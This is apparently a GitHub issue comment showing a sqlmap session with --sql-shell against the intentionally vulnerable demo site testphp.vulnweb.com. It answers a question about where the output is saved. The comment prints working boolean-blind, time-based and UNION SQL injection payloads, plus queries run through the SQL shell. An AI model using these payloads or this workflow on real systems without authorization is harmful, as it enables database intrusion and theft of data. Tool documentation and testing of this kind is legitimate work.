stamparm
commented
2 weeks ago $ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch --sql-shell
___
__H__
___ ___[']_____ ___ ___ {1.8.5.4#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:21:04 /2024-05-17/
[18:21:05] [INFO] resuming back-end DBMS 'mysql'
[18:21:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: artist=-5534 OR 9385=9385#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: artist=1 AND (SELECT 4969 FROM (SELECT(SLEEP(5)))hpgN)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9480 UNION ALL SELECT NULL,NULL,CONCAT(0x7162767671,0x794552797a41494545674554715957725a5253616264625347534f64444358655a415150646b6f64,0x7170717671)-- -
---
[18:21:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[18:21:05] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> SELECT VERSION()
[18:21:08] [INFO] fetching SQL SELECT statement query output: 'SELECT VERSION()'
SELECT VERSION(): '8.0.22-0ubuntu0.20.04.2'
sql-shell> SELECT CURRENT_USER()
[18:21:18] [INFO] fetching SQL SELECT statement query output: 'SELECT CURRENT_USER()'
SELECT CURRENT_USER(): 'acuart@localhost'
sql-shell> exit
[18:21:20] [INFO] fetched data logged to text files under '/home/stamparm/.local/share/sqlmap/output/testphp.vulnweb.com'
[*] ending @ 18:21:20 /2024-05-17/
$ ll /home/stamparm/.local/share/sqlmap/output/testphp.vulnweb.com
total 24
drwxrwxr-x 2 stamparm stamparm 4096 svi 17 18:21 ./
drwxrwxr-x 5 stamparm stamparm 4096 svi 17 18:21 ../
-rw-rw-r-- 1 stamparm stamparm 863 svi 17 18:21 log
-rw-r--r-- 1 stamparm stamparm 8192 svi 17 18:21 session.sqlite
-rw-rw-r-- 1 stamparm stamparm 137 svi 17 18:21 target.txt
$ cat /home/stamparm/.local/share/sqlmap/output/testphp.vulnweb.com/log
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: artist=-5534 OR 9385=9385#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: artist=1 AND (SELECT 4969 FROM (SELECT(SLEEP(5)))hpgN)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9480 UNION ALL SELECT NULL,NULL,CONCAT(0x7162767671,0x794552797a41494545674554715957725a5253616264625347534f64444358655a415150646b6f64,0x7170717671)-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
SELECT VERSION(): '8.0.22-0ubuntu0.20.04.2'
SELECT CURRENT_USER(): 'acuart@localhost'
How can I save the output when using the --sql-shell command?